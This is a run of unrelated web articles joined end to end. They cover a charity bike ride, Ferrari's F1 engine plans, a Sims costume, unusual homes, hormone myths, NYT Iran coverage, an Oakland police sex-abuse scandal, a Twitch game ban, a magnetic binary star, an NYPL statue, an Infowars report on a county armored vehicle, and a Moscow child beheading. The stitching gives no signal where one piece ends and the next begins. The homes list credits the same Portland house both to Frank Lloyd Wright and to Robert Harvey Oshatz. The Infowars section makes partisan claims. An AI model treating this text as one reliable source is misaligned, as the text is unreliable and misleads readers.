When I and 3 ERC colleagues committed to do the London to Brighton Bike Ride in 2016 the manager of BGC, Sue Wade kindly agreed to support ERC by making sure our bikes were in good condition ahead of the ride. What struck me when I contacted Sue was how quickly she had said yes (which is not to say that BGC can always do this – they have to raise income and be sustainable to meet their own objectives).
Before my good fortune in coming across BGC I had been in contact with a national cycling chain with a Camden branch which two of us had actually bought our bikes from. That big company didn't feel able to help us with our request which is, of course, their prerogative but I did think at the time that it was a slightly short-sighted decision on their part, bearing in mind all the local recognition and publicity we would have given them. But for BGC it was an automatic decision based on their community spirit and ethos regardless of whether it held any possible benefit for them.
I think there is something in our experiences about how voluntary organisations and businesses, whether either is big or small, that can create meaning and sustained relationships based simply on retaining a sense of generosity and respect in giving support and in working with each other. When that happens we all become community workers no matter who pays our wages.
"Our objective, in terms of tokens, is really to spend only few at the start of the season, to maintain a significant opportunity of developments during the season," Binotto added. "The current 2015 PU has already gained a significant amount of performance, and we will keep pushing during the entire season."
This is directly opposed to the route being taken by Mercedes and Renault who will spend the majority of their tokens before the season commences meaning the offset in performance could see Ferrari struggle in the opening part of the season. Furthermore with drivers only able to use 4 powerunit during 2015 and a total of 20 (maybe 19 if Germay is lost too) races on the calender it means changes can only be made to the powerunit alongside the scheduled PU change (every 4-5 races) meaning the first time Ferrari will be able to update the PU will be Bahrain/Spain or sacrifice a PU for their driver.
As always as this is only a launch piece there's likely to be many changes to the SF15-T over the coming weeks, so keep your eye on the blog for updates.
I always found it kind of funny that whenever one of The Sims characters had to do something like go to the bathroom or take a shower, their body's were pixelated out so you couldn't see any of their private bits. I understand it since they didn't want them to be M rated games but I still think it was a little silly, however not as silly as the Sims free play game on the iPad where they just take a shower in their bathing suit.
Anyway, this girl who clearly has a fantastic sense of humor decided to turn this funny idea into an awesome costume and made the idea of pixelated bodies even funnier! Unfortunately, I have no idea who she is to give her credit.
Pass this along to any fans of The Sims that you know! Like Fanboy Fashion on Facebook too!
[via Dorkly]
When describing the dream home, we each have in mind our own ideas and designs. We are all unique and different and this is why each person envisions a space differently. Some people like to keep things simple and classical while others prefer a more adventurous solution. This has sometimes resulted in the creation of some very unusual and intriguing homes. Here are just a few examples:
The World's Skinniest House.
We're going to start with the world's slimmest home. Known as the Keret House, this space is used as artist's residence. The artist lives here a few days a week and, given the size and structure of this space, it can't really be considered a full-time residence. The architect that designed the space has been working at this project for three years and finds it very interesting. He was inspired by the work of Israeli writer Etgar Keret, who writes extremely short stories.
The Keret House is in fact a very narrow space in between two buildings. It connects the buildings but, at the same time, it's also independent from them. Since the size of the space represents a problem and an obstacle, making it feel airy and spacious is nearly impossible. Still, several solutions were found. For example, the transparent roof lets in lots of natural light and prevents the space from feeling cluttered and claustrophobic.
Moreover, the house also has an open stairway and an entire wall of windows. In order to not interfere with the structure of the neighborhood, the house was built about ten feet above the ground. It's 30 feet tall and it's unofficially known as the world's slimmest house. There are also several other structures that could easily fall into the same category.
Apartment With Basketball Court.
We now go from small to large. If the Keret House impressed with its narrowness, this space impresses with its spaciousness. It's a very large and very spacious residence and, even though the photos might show it as a quite normal space, you have to imagine that everything you see is on a much larger scale to be able to fully understand the proportions.
This space was actually a warehouse at some point. It then got converted into a private residence. It's located in Soma, near San Francisco, California and has an intriguing design. The exterior doesn't seem that strange. It's actually quite simple and classical. It's the interior that impresses the most. It all begins as soon as you reach the entrance door. As it opens, it reveals a very large and open space where nature feels like an organic part of the design.
The living room is the central space. Here all the furniture is organized along the walls, leaving the center open and free. The décor is very interesting. It's a complex combination of diverse elements and yet the atmosphere is very pleasant and everything feels cohesive. The overall décor is modern and simple.
Skate house.
Next on our list are two intriguing homes based on a similar concept. Every person has their passions and crazy ideas that they would love to explore. For the owners of these homes, the passion is skateboarding so they wanted these spaces to reflect that. The first home is the PAS House. It was designed as a continuous skateable space. It goes from one end to the other and it's similar to a ribbon. The PAS House was designed by Gil Lebon Delapointe and architect Francois Perrin.
Situated high on a cliff in Malibu, the house also provides privacy and given the owner the liberty of enjoying it to its full potential. Moreover, the house also offers stunning views of the Pacific Ocean. The internal structure is very simple. The house includes a living room, a dining room, a kitchen, a bedroom, a bathroom and a skateboard practice area.
The central portion of the house is a large loop that measures 10 feet in diameter. It was designed as a practice and entertainment area and it can even become a second living room if furniture is added. It's a simple and nice combination of spaces where everyone feels comfortable but where the owner also can combine two things: the passion for skateboarding and the coziness of a home.
Skate Villa.
The second house that we were talking about is the Skate Villa. The name is indeed very suggestive. In the case of this project, the plan and strategy were a little different. Instead of restricting the practice area to a loop or a delimitated space, the whole house is skateable.
The concept is very interesting. The house has all the comfort and everything that an unusual home has but, in addition, everything was modified and custom-made to also be skateable. Concrete mounds were added at the base of the walls and straight lines became curved. Ramps were also created throughout the house, including one on the fireplace. All these custom changes were designed by professional skater Philipp Schuster.
He wanted this place to really feel like home and to reflect his personality and passion for skating. He purchased the house from an elderly couple a while ago and decided to renovate it and transform it. However, some of the original features were preserved in order to maintain the original charm of this place. They include elements such as the dark wood features, the hunting trohpies and the traditional furniture.
Epu house.
The next project on our list is also a unique house. It can't actually be called a residence because of the dimensions but it has lots of unique features. This is Epu. It's a house that was built on a 7′ x 14′ utility trailer. It has all the elements that a regular home has and the only difference is the design and layout. Epu has a living room, a kitchen, a bedroom and a bathroom.
The living room or the main room features a built-in desk and it's a bright space with large windows on all sides. The living room even has a fireplace, not the element you would expect to see in such a small space. The kitchen is also small. It has a sink, a 2 burner stove top, a refrigerator and lots of storage space on the shelves. Under the sink there's also a water heater. Given the size of this room, there's not enough space for a dishwasher but the space adjacent to the living room that serves as a closet can accommodate it.
The bedroom is large enough to accommodate a queen-sized bed. The shelving can be used to store clothes and there's not much space for other furniture pieces. The bathroom is tiny and only has a shower. The water is heated using the dispositive under the kitchen sink and doesn't leave much freedom as it runs out in about 5 minutes.{found on site}.
Amazing tree house.
A house is a house no matter the size or design. But some designs are just too unusual to go unnoticed. Some seem too strange to be true. For example, take a look at this house. Designed by Frank Lloyd Wright, this house can be seen in Portland, Oregon and it's a celebration of the natural environment that surrounds it.
The house was designed by architect Robert Harvey Oshatz. The client had few but challenging requests. First of all, he wanted the house to seamlessly integrate into the landscape and to sit in harmony with nature and the environment. The second request was to make the house a physical representation of music. This was a challenging detail that dictated the entire design. The architect took advantage of the structure of the site.
The lot had a very steep slope and it's there that the house was built. This way the main floor is at the level of the tree canopy. It's almost like sitting in a tree house. To make it integrate into the landscape even better, the architect used features such as walls of grass and organic shapes throughout. The walls, the ceilings and the floors are all made of natural wood. Other materials used include natural stone. It took the architect several years to complete this project but the results are stunning.
Train Car Home.
Personally I love riding trains very much. I particularly enjoy long trips and the way the train gently moves and makes me sleepy. In those moments I wish I could make the train my home. Of course, it's just an impulse thought. But for some people, the inspiration goes to a whole different level. For example, in Portland there is a train that was converted into a home.
It's a very strange type of home but it's a cozy space nevertheless. The 807 square foot space was completely transformed and redesigned. It was converted into a home, with living spaces, sleeping areas, bathroom and kitchen. The interior is modern and, despite the strange shape of the spaces and the challenging dimensions, the interior doesn't feel cluttered or tiny. It's actually quite airy and bright.
Among the modern featured included in the design, we can mention the full electric kitchen and the incinerator toilet. The design is interesting and the transformation is spectacular. There's also another interesting detail about this so-called home. Since technically it's not a real estate, there are no property taxes. The train home is currently listed at $225,000.
Conch Shell House.
Remember those tiny crabs that borrow shells and make them their home? Have you ever imagined yourself living in a seashell? Probably not, since it's a crazy idea. Well, some people don't agree with that. Just take a look at this home. It's a house with a design inspired by a spiral shell. The shape and design are unusual and very suggestive. But that's not the only connection this house has with nature.
The house was built using a combination of natural and inorganic materials that include local seashells and regional coral. All the walls are curved and there are no corners. To make things even more interesting, the house is located on a beach of a southern island and this allows the similarities with the actual spiral shell become even more apparent.
This unusual home was built for an artist named Octavio Ocampo. This is probably the only detail about this house that isn't surprising. The artist wanted this placed to be a combination of elements, at the limit between art and functional design. Some elements, such as the spiked roof, are purely decorative. Others, such as the second-story deck, also have a functional part. The overall design is very fluid and gracious and the only detail that disrupts this continuity is represented by the windows and doors.
Curved Spiral Shell House Design.
Although the house we've just presented you is unique, it's not the only one that has a design inspired by seashells. There are other homes that were also based on the same concept. One of them is this beautiful house that was designed by Senosiain Arquitectos and, in case you didn't notice, it was patterned after a shell.
The house was built using a combination of steel wire and a special type of thick concrete. The result was a very strong and durable structure that, despite its curved and gracious lines, was designed to last. It's also a low-maintenance structure, a detail that makes it even more stunning. The exterior design of the house features only curved lines and shapes.
The same elements can also be found inside as they are used throughout the house. The interior is decorated with plats and organic patterns. The stone paths and all the other details almost make it feel like the outside. The house is decorated with modern features and it's very cozy. Not only that it has an original design and a look that makes it impossible to miss or to mistake for another, but it's also a fully-functional home and an amazing space.
An underground eco home.
All homes are divided into different spaces. They each serve different functions and usually have independent designs but they also all follow an overall continuous design as they are part of the same space and structure. But what if they weren't? Then the house might look like this:
This unusual structure was designed and built by Make Architects. There are several interesting aspects related to this house. First of all, this is an underground home. Then there's also the design and the layout. The rooms of this house were organized around a central kitchen and they each resemble a petal. Together they form a flower shape.
Moreover, the house also impresses on other levels as well. Not only that it's stunning from an architectural point of view, but it's also a low-maintenance and eco-friendly home. It was built using locally-sourced materials and traditional building methods. It was almost entirely built into the hillside and it seamlessly disappears into the landscape. When seen from above, it resembles a flower with rooms instead of petals. Moreover, the house also has a glowing floral impression on the landscape when lit at night, which makes the comparison even more interesting.
With the Middle East in turmoil, the economy sluggish and the nation facing a fiscal cliff, who would have thought that female hormones would become a big deal?
It's been that kind of year.
Republican Rep. Todd Akin of Missouri — who is running for U.S. Senate — created a firestorm earlier this year when he presented his scientific theory of "legitimate rape.”
Women, apparently, have magic hormones that can distinguish when they have been actively raped and when they were just “asking for it.” In the case of the former, the hormones mount a rapid defense and the women don't get pregnant. In the latter case — whoops, impending motherhood.
Republicans in droves deserted Akin — including GOP presidential candidate Mitt Romney, Wisconsin Gov. Scott Walker and Texas Sen. Kay Bailey Hutchison — and urged him to pull out of the race against Sen. Claire McCaskill.
Republican Rep. Todd Akin, R-Mo. (AP File)
Well, he didn't. Now, conservative supporters are back to pouring money into his campaign and even the GOP establishment seems to have had a change of heart.
Akin's argument about the mysterious power of female hormones is hardly new.
In 1947, when some women resisted getting pushed out of their wartime jobs as the soldiers came home, the book “Modern Woman: The Lost Sex” became a bestseller. Its thesis: "Male-emulating [female] careerists have such anxiety about pregnancy that their glands secrete chemicals that destroy fertility."
Baby-killing hormones in career women!? Good grief, those hormones are versatile.
In 1970, prominent physician Dr. Edgar Berman opined that women were unsuitable for elected office because of their unstable hormones. When U.S. Rep. Patsy Mink of Hawaii, took him to task, he suggested that it was just her raging hormones going out of control. “Even a congresswoman must defer to scientific truths,” he said.
But in the present era, with women sitting on the Supreme Court and flying Space Shuttles, you'd think the old hormones nonsense would have died down.
Think again.
In the 2006 bestseller “The Female Brain,” author Louann Brizendine claims:
“When boys and girls enter their teens, their math and science abilities are equal. But as estrogen floods the female brain, females start to focus intensely on emotions and communication… and start to lose interest in pursuits that require more solitary work."
This, she explains, is why girls don't do well in math.
If this was true, it stands to reason that we would see boys' math scores at this age soaring ahead of girls' scores, right?
But in 2001, researchers at the University of North Carolina, Chapel Hill looked at some 20,000 math scores of children ages four to 18 and found no gender differences of any magnitude. Not even in areas that are supposedly male domains — such as reasoning skills and geometry.
A broader argument suggests that the hormones and brain structures of males and females are so different that boys and girls must be educated and parented in very different ways.
In the oft-cited 2004 book “The Essential Difference,” psychologist Simon Baron Cohen claims that the male brain is best for “systematizing,” while the female brain is wired for empathy. According to this theory, the male brain is ideally suited for leadership and power.
The female brain on the other hand is best for making friends, mothering, gossiping, and “reading” a partner. Girls and women, he contends, are so focused on others that they have little interest in figuring out how the world works.
To put things in perspective, it's worth pointing out that this whole thesis is based on one study that found boy newborns were more drawn to objects, while girl babies were more drawn to faces.
There is also a long list of literature flat-out contradicting Baron-Cohen's study, providing evidence that male and female infants tend to respond equally to people and objects — regardless of gender.
Cordelia Fine, a cognitive neuroscientist at the University of Melbourne, says gender myths dress up as science and propagate dangerous new conventional wisdom. In her 2010 work, "Delusions of Gender," she wrote:
“There's little evidence for the idea of a male brain hardwired to be good at understanding the world and a female brain hardwired to understand people.”
When people say positive things about female hormones, it's usually about how verbal and communicative women are, compared to strong, silent men. But even that's up for debate.
In the “The Female Brain,” Brizendine states that women use 20,000 words per day, while men use only 7,000.
But after conducting a seven year study of men's and women's speech, University of Texas, Austin psychologist James Pennebaker found that both genders use roughly the same number of words in a day – approximately 16,000.
Alas, no matter what the data say, there's always going to be someone who comes up with some other power — or drawback — of those mysterious female hormones. And predictably, those who can benefit from the pseudo-science will be all too happy to exploit it.
Parts of this piece were adapted from "The Truth About Girls and Boys: Challenging Toxic Stereotypes About Our Children" by Caryl Rivers and Rosalind C. Barnett. Copyright © 2011 Caryl Rivers and Rosalind C. Barnett. Reprinted with permission of Columbia University Press.
(updated below - Update II [Sat.])
On January 25, the New York Times Sunday Magazine published a lengthy article by Israeli journalist Ronen Bergman that conveyed the views of multiple Israeli officials about Iran in order to conclude that an Israeli attack is likely. That the entire article was filled with quotes from Israelis meant the piece served as a justification for such an attack while masquerading as a news story about whether the attack would happen. Indeed, the very first paragraph contained this bit of manipulative melodrama: "'This is not about some abstract concept,' [Israeli Defense Minister Ehud] Barak said as he gazed out at the lights of Tel Aviv, 'but a genuine concern. The Iranians are, after all, a nation whose leaders have set themselves a strategic goal of wiping Israel off the map'." Note that we are told that Barak uttered this article-shaping blatant falsehood "as he gazed out at the lights of Tel Aviv." So solemn, contemplative and profound.
Advertisement:
Yesterday, the NYT published an Op-Ed by Amos Yadlin, one of the Israeli Air Force pilots who attacked the Iraqi nuclear reactor in 1981 and then became chief of Israeli military intelligence, arguing for the necessity of an attack on Iran and warning that Israel will do it if President Obama does not give absolute commitments of his intent to do so. Today, the NYT has a news article by incoming Jerusalem Bureau Chief Jodi Rudoren summarizing the views of Israeli President Shimon Peres that an attack on Iran is imperative ("This is an unavoidable situation. It's not exactly the Nazi situation, but my God, what a catastrophe") and warning Obama that "if the White House [is] not resolute, Israel might have to go it alone." Also today, the NYT has a news article by outgoing Jerusalem Bureau Chief Ethan Bronner summarizing the views of Netanyahu and other Israeli officials in advance of their meetings this week with Obama: "Israel will not outsource what it views as its vital security interests based on an American promise to take military action if sanctions fail. Israel's goal is an American attack on Iran, but it seems unlikely to wait till it no longer can do it by itself."
For months, Americans have been subjected to this continuous, coordinated, repetitive messaging from Israeli officials, amplified through the U.S. media. This is generally how the establishment American media conducts the debate over whether to attack Iran: here are Israeli officials explaining why an attack is urgent and why the U.S. must conduct it. Now here are American officials explaining why an attack can wait a little while longer but that it will happen if necessary to stop Iran from having a nuclear weapon. Occasionally, here are American foreign policy experts arguing why an attack would be too difficult and costly. What is missing from the debate are the views held not only by Iranian leaders but also large populations in numerous capitals and nations around the world: that Iran has the right to pursue its nuclear program; that it is Israel and the U.S. -- not Iran -- that poses the greatest threat to world peace; that American and Israeli aggression against non-nuclear states (along with their massive stockpile of nuclear weapons) is what makes it rational for a nation to want to proliferate, etc. One does not have to agree with any of those views to recognize how widely they are held in the world and how much of a place they (therefore) merit in the discussion.
If one searches hard enough, one can likely find American media accounts attempting to describe or present the views of Iran on this conflict or other nations which support it -- just like NBC News can point to a single Iranian source among the tidal wave of American and Israeli government and military officials who brief its top executives and shape their understanding of the issue. But overwhelmingly, the American media continuously amplifies the views of American and Israeli officials while all but suppressing the views of those on the other side. For every one Iranian official Americans are permitted to hear from (and they are treated with extreme skepticism by American journalists), they hear from countless Israelis (who are treated with the utmost deference). The same thing happens on an even more extreme scale with the Israeli-Palestinian conflict (one almost never hears from Palestinians in our media debates), and more extremely still when it comes to demonizing America's designated enemies (who are virtually never heard from, and are sometimes even officially excluded from media reports). This is the dynamic by which the American establishment media, often without even consciously realizing they're doing it, severely narrows and distorts our national political debates while pretending to host free-ranging and vibrant discussions.
UPDATE: Speaking of how the American media and the U.S. government jointly function, here is a little mathematical formula:
This:
plus this:
equals this:
That's the reward system in action. Goldberg twice assures everyone concerned that President Obama is "tougher" on Iran than even the Republicans were or are (Obama Deputy Campaign Manager Stephanie Cutter proudly re-tweeted Goldberg's Toughness praise), and Goldberg then is granted "the most extensive interview [Obama] has given about the looming Iran crisis," in which he again assures everyone that Obama Is Tough and Means Serious Business.
Advertisement:
UPDATE II [Sat.]: As'ad AbuKhalil writes:
New York Times casually open its op-ed pages for Israeli officials or former Israeli officials to call for and agitate for bombing of Iran, or some Arab country. Would the New York Times allow Arabs to write "opinion pieces" in which they call for bombing of Israel?
AbuKhalil's blog is well worth reading in general: one doesn't have to agree with his substantive policy views to appreciate his unique, expertise-based ability to highlight the contradictions and propaganda that is disseminated on a daily basis in the U.S. about that part of the world. And his rhetorical question here underscores the point: the way in which the American establishment media, which depicts itself as "neutral" and a facilitator of open debate, constantly restricts those very debates in quite rigid ways.
OAKLAND — A teen who says she's had sexual contact with some 30 East Bay law enforcement officers filed a $66 million claim against the city of Oakland on Friday as prosecutors filed criminal charges against two of the officers implicated.
The claim says that the teen was trapped in the sex trade as a minor and reached out to Oakland police for help.
Related Articles Sex scandal victim's attorneys charge ‘obstruction at highest levels'
Police sex scandal: The punishments recommended for Richmond cops
Bay Area police sex scandal: Woman freed from Florida jail “Instead they continued to exploit her by trading money, information, and/or protection for sex. Instead of helping (her) find a way out of exploitation, they furthered and deepened her spiral down into the sex trade,” the claim reads.
Attorneys for the teen, who previously went by the name Celeste Guap but has since disavowed the alias, could not be reached to talk about the $66 million claim. If the claim is denied by the city, it clears a path for a civil lawsuit. This newspaper is not using the teen's real name because she is the victim of a sex crime.
Oakland Mayor Libby Schaaf, who's been outspoken in her condemnation of Oakland officers involved in the scandal, declined to comment.
Retired Oakland police Sgt. LeRoy Johnson and former Livermore Officer Daniel Black were the first to be criminally charged Friday in connection with the sex scandal involving the sexually exploited teenager and multiple law enforcement agencies. Alameda County District Attorney Nancy O'Malley said that she plans on charging four more Oakland officers and one Contra Costa County sheriff's deputy.
The allegations came to light after Oakland police Officer Brendan O'Brien committed suicide last year and left a note naming officers who had sex with the teen. The woman turned 19 last month but began having sex with officers while she was underage.
It is the largest law enforcement sex scandal in the East Bay's history, and the fallout caused Oakland to go through three police chiefs in nine days in June. Schaaf announced that there would be firings, suspensions and more training for officers involved.
The teen returned to the Bay Area this week after being released from a Florida jail, where she was held for two weeks after biting an employee at the Florida drug rehabilitation center she entered in late August. Richmond police have been criticized for helping send her to Florida, given that Richmond officers are implicated in the scandal, and the teen is a witness in the criminal investigation.
Johnson, a 50-year-old Texas resident, is charged with misdemeanor failure to report child abuse. During his career, one of Johnson's assignments was supervising the police dispatch unit, in which the teenager's mother has worked for years.
Johnson is described as a family friend of the teen and her mother in a probable cause declaration written by Jim Taranto of the Alameda County DA's Office. He wrote the teen was vacationing in Puerto Rico with her mother in September 2015 when she sent private messages to Johnson through Facebook and disclosed that she had had sex with members of the Oakland Police Department.
“Tell me you were and (sic) adult,” Johnson allegedly wrote.
“I'd be lying,” the teen replied, according to the DA's Office.
The teen asked Johnson not to report what she said, and he did not, despite being a mandated reporter legally bound to report child sex abuse, Taranto said.
Black, 49, was charged with five misdemeanor charges: two counts of “engaging or agreeing to engage in prostitution,” and one count each of engaging in lewd conduct and furnishing a minor with alcohol. He retired from the Livermore Police Department earlier this month.
The DA's Office said in court documents that Black picked her up in his motor home and took her out to dinner in Albany and Berkeley on April 8 and April 16. Afterward, on both occasions, they engaged in sexual activity in the motor home.
“Just to be clear, I'm not paying you, but I will buy you dinner,” Black told the teen, according to Taranto.
Black and Johnson are scheduled to be arraigned on the charges Oct. 4. They have not been arrested in the case.
Johnson, O'Brien, former Oakland police Chief Sean Whent, and nine officers identified by their initials are named as respondents in the teen's claim with the city of Oakland. In his suicide note, O'Brien claimed he never had sexual contact with the teen. O'Malley said it doesn't appear they ever met in person.
The teen's claim said that she met O'Brien in 2015 “while running from a pimp,” and instead of protecting her, O'Brien began sexually exploiting her.
“In addition to Officer O'Brien, Officer G.L. and other officers and deputies also sexually exploited (her) when she was a minor, and continuing into 2016, after she turned 18, providing her protection and information about police business for sexual favors,” the claim reads. “None of them ever offered her information or help in escaping from sexual exploitation.”
At a news conference last week, O'Malley said she found evidence of officers committing crimes in Contra Costa, San Francisco and San Joaquin counties. Authorities in those jurisdictions say they are conducting ongoing investigations into the matter.
Both the Oakland police and the Alameda County District Attorney's Office declined to comment Friday.
Video game streaming site Twitch.tv has decided that the fragile souls of its userbase must never be subjected to videos of Yandere Simulator, banning the game from being broadcast.
Yandere Simulator casts players as a psychotic wannabe girlfriend of another student in an anime-themed high school. Almost the entire game takes place on the school grounds, with brief asides to the player character's home.
The game is played much like the Hitman franchise, with a “creepy schoolgirl” twist. You'll do your best to manipulate and almost certainly eventually murder other students that you see as threats stealing away your relationship to your “senpai.” The game incorporates sanity and reputation systems, minigames, and various other details to aid in your simulated stalking.
It's an admittedly grim premise, but the game itself is intended to be more tongue-in-cheek than the concepts might suggest. It's a darkly comedic stalker simulator, but Twitch doesn't find it particularly amusing. They've decided it's best kept out of the hands of streamers.
While they still allow plenty of higher-profile games featuring prostitution, sex, torture, and murder, apparently it being done by uniform-clad school girls has crossed the wavering censorship line. Despite having a “mature audience” restriction option already in place, Yandere Simulator has been set on a dusty virtual shelf alongside more overtly offensive games like Battle Raper.
The developer behind Yandere Simulator has reached out to Twitch for an explanation as to why his game was banned in hopes of resolving the issue but has not received an answer at the time of this writing.
Follow Nate Church @Get2Church on Twitter for the latest news in gaming and technology, and snarky opinions on both.
Representational Image.
Scientists have discovered the first massive binary star, epsilon Lupi, in which both stars have magnetic fields.A binary star is a star system consisting of two or more stars, orbiting around their common centre of mass.For the past few years, the BinaMIcS (Binarity and Magnetic Interactions in various classes of Stars) collaboration, formed to study the magnetic properties of close binaries, has been trying to find such an object.They have now discovered one using the Canada-France-Hawaii Telescope."The origin of magnetism amongst massive stars is something of a mystery and this discovery may help to shed some light on the question of why these stars have magnetic fields," said Matt Shultz, a PhD candidate at the Queen's University in Canada.In cool stars, such as the Sun, magnetic fields are generated by a convection in the outer portion of the star.However, there is no convection in the outer layers of massive star, so there is no support for a magnetic dynamo.Nevertheless, approximately 10 per cent of massive stars have strong magnetic fields.Two explanations have been proposed for the origin of massive star magnetic fields, both variants on the idea of a so-called "fossil" magnetic field, which is generated at some point in the star's past and then locked in to the star's outer portion.The first hypothesis is that the magnetic field is generated while the star is being formed; the second is that the magnetic field originates in dynamos driven by the violent mixing of stellar plasma when the two stars in a close binary merge."This discovery doesn't change the basic statistics that the BinaMIcS collaboration has assembled and we still don't know why there are so few magnetic, massive stars in close binaries," said Mr Shultz.The research shows the strengths of the magnetic fields are similar in the two stars, however, their magnetic axes are anti-aligned, with the south pole of one star pointing in approximately the same direction as the North Pole of the other."We're not sure why that is yet, but it probably points to something significant about how the stars are interacting with one another. We'll need to collect more data," Mr Shultz added. The research was published in the journal Monthly Notices of the Royal Astronomical Society.
The other day, I was scouting the steps of the New York Public Library main branch. I've had to do this assignment a million times over the years for various movies and TV shows that want to shoot at the world's most famous library, and I began thinking how sad it was to know a location so well that there were no surprises left to find.
As I was taking the pictures, I happened to zoom in on this row of statues over the main entrance:
Nothing really stood out about them…
Just your run-of-the-mill toga-clad statuary, all looking appropriately deep in thought:
I was about to move on when one of the statues caught my eye: a woman, who resembled all the others except for one very unusual feature…
She was holding a decapitated head.
OK, I've been to the New York Public Library a million times over the years, and I've NEVER noticed this. Who is she, and why does she look so angry? And who was the bodyless man?
I couldn't find the answer anywhere online (everyone just writes about the lions) so I wrote to the NYPL. It turns out that is the personification of Drama, as sculpted by Paul Wayland Bartlett. She is joined on both sides by fellow “attic sculptures” representing (from left to right) History, Romance, Religion, Poetry, and Philosophy.
So does that mean it's just a Tragedy mask? That would make sense, but tell me I'm wrong in thinking that looks like she's holding a head by the hair. Is there a particular work this was inspired by?
Whatever the answer might be, finding the statue of a woman holding a decapitated head on the New York Public Library is a really great reminder for the New Year that, no matter how well you think you know New York, there are ALWAYS surprises to be found.
-SCOUT
If you enjoyed reading this post, would you consider making a donation to help me make my first movie? The goal is $50,000, and to date, 1,728 Scouting NY readers have donated $36,348! Just $5 or $10 can make a difference - AND you get this snazzy Scouting NY sticker/magnet as a Thank-You gift! Click here to donate today!
And hey, if you've made it this far, why not follow us via RSS, Twitter, Facebook, Instagram, or Tumblr?
Residents of a virtually crime free county in Florida are expressing outrage over a decision by the Walton County Sheriff's Office to purchase an MRAP armored vehicle normally used to hunt insurgents in Iraq and Afghanistan.
“The Walton County Sheriff's Office got the mine-resistant, ambush-protected (MRAP) vehicle for the cost of transporting it. The vehicle, for which the department paid $2,500, was a surplus military vehicle that was demilitarized for law enforcement use,” reports NWF Daily News.
Walton County Sheriff's Officer Mike Adkinson denied that the purchase of the vehicle was an attempt to militarize the police department, adding that he wouldn't let public opinion get in the way of the “safety” of his colleagues.
“This is not the federal government intruding on your civil liberties,” wrote Adkinson in a Facebook post. “Would you really want them sent into harm's way without the best protection available, simply because the military originally purchased this vehicle?”
This didn't stop residents expressing their anger at the decision to buy the vehicle, with one commenting that the purchase represented “an offensive intimidation method used to controll [sic] and strike fear.”
Another respondent agreed, remarking, “This doesn't make the officers safer. All studies show that the more militarized a department becomes, the more often officers get hurt. This is Walton County, Florida, not Iraq, not Afghanistan.”
As Justin King points out, despite Adkinson's effort to justify the purchase by pointing to examples where cops have had to deal with suspects barricaded inside their homes, Walton is such a peaceful and virtually crime free neighborhood that it was used to represent an idyllic American town in the 1998 movie The Truman Show.
“Walton County is a part of Florida that is so crime free you can leave your doors unlocked. When Hollywood location scouts were looking for a community so perfect that it appeared to be fake, they came to Walton County. The Truman Show, staring Jim Carey, was filmed on location in a small Walton County community,” writes King, accusing the Sheriff's department of abandoning common sense by purchasing the vehicle and pointing out that it is only likely to spur additional violence.
“This vehicle is an implement of war. It has no place in this county. The decision to bring this to a small community will only increase violence against citizens by creating a combat mindset in deputies. This violence will be returned, and deputies will face violence on a level not seen before in Walton County,” writes King.
The purchase of armored vehicles formerly used in anti-terror operations overseas has prompted widespread concern that domestic law enforcement in the United States is becoming increasingly militarized and violent. A recent ACLU investigation into the issue decried the fact that American neighborhoods are turning into warzones as SWAT tactics become more brutal, causing an increase in deaths, injuries and property damage.
Former Marine Corps Colonel Peter Martino, who was stationed in Fallujah and trained Iraqi soldiers, warned last year that the Department of Homeland Security is working with law enforcement to build a “domestic army,” because the federal government is afraid of its own citizens.
Martino was speaking at a council meeting concerning a decision to purchase a BearCat armored vehicle. The purchase of the vehicle was mired in controversy after the city's Police Chief wrote in an application filing to the DHS that the vehicle was needed to deal with the “threat” posed by libertarians, sovereign citizen adherents, and Occupy activists in the region.
Since the winding down of operations in Afghanistan and Iraq, the Department of Defense has been donating armored vehicles to the Department of Homeland Security which in turn has been selling them to police departments across the country.
Last month we reported on how police in the Wisconsin town of Neenah had to resort to reassuring residents that military trucks obtained from the U.S. Army now being deployed for domestic law enforcement duties won't be used to fire on the locals.
In another report last month, Indiana Police Sergeant Dan Downing admitted that the militarization of domestic law enforcement was partly to deal with returning veterans who are now seen as a homegrown terror threat. A local Fox affiliate reported that the cops were now “armed for war” against such threats.
Facebook @ https://www.facebook.com/paul.j.watson.71
FOLLOW Paul Joseph Watson @ https://twitter.com/PrisonPlanet
*********************
Paul Joseph Watson is the editor at large of Infowars.com and Prison Planet.com.
Moscow (AFP) - A nanny accused of decapitating a young girl in her care then walking through the street brandishing the head, on Wednesday said "Allah ordered" the killing as she appeared at a Moscow court.
Suspect Gyulchekhra Bobokulova from Muslim-majority Uzbekistan -- whom the press have dubbed "the bloody nanny" -- was detained on Monday as she was waving the child's severed head outside a metro station in northwestern Moscow. She was sent for psychiatric examinations.
"It was what Allah ordered," the 38-year-old told journalists as she was brought into the district court to have her arrest confirmed and extended.
With shoulder-length black hair parted in the centre, she wore a royal blue pinafore over a black tracksuit top.
At times, she smiled, other times she grimaced, flashing a few golden teeth.
Speaking in broken Russian from the suspect's cage, Bobokulova said: "Allah is sending a second prophet to give news of peace" and also complained that she was "hungry", had not been fed and would "die in a week".
"Hi to everyone," said the mother-of-three, waving at the crowd of journalists in the courtroom.
Investigator Olga Lapteva, who was clearly emotional, told the court that Bobokulova was suspected of committing an "extremely serious crime" and that she should face "a mandatory prison sentence of considerably more than three years."
The court confirmed the nanny's arrest and ordered her held in custody for two months as investigations continued.
Investigators would push to have Bobokulova charged on March 4, Lapteva said.
- Brainwashed schizophrenic? -
Investigators are trying to establish whether Bobokulova had any accomplices.
State news agency RIA Novosti, citing a law enforcement source, said Bobokulova had recently been brainwashed by her Tajik lover, who was apparently a radical Muslim himself.
The mass-circulation Moskovsky Komsomolets, citing Uzbek police, said the woman had suffered from schizophrenia for about 15 years.
Komsomolskaya Pravda, citing a close family friend, said the live-in nanny had recently become very religious, spent a lot of time online and had brought home a prayer mat.
Bobokulova has been undergoing psychiatric examinations since her detention over the murder of the girl, Nastya, whom the judge said was born in 2011. Investigators had initially estimated she was three or four years old.
She is suspected of butchering the girl, who had suffered from learning disabilities and epilepsy, at the family's apartment in northwestern Moscow, before torching it and fleeing the scene.
Witnesses reported seeing an agitated woman dressed in black who threatened to "blow everyone up," with one media report saying she shouted "Allahu Akbar" -- Arabic for "God is greatest" -- as she paced up and down outside a metro station.
- Fundraising for the family -
The shocking incident has shaken usually hard-bitten Muscovites and people have flocked to the Oktyabrskoe Pole metro station to lay flowers and pray.
A friend of the bereaved family, Andrei Mishchenkov, said on Facebook that some 2.5 million rubles ($33,780/31,000 euros) had so far been collected from the public in a drive to help the parents.
Russia's national television channels have refused to cover the killing in a controversial move that the Kremlin defended, saying the subject was "probably too monstrous to be shown on television".
